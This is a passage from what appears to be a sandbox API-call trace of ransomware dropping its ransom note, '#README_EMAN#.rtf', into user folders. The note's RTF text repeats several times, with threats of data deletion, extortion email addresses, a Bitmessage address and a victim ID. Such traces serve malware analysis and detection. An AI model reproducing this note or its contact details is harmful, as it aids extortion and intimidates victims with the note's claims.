automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.572] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.572] CloseHandle (hObject=0x2c8) returned 1 [0278.572] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\#readme_eman#.rtf")) returned 0xffffffff [0278.572] GetLastError () returned 0x2 [0278.572] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.573] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.573] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a 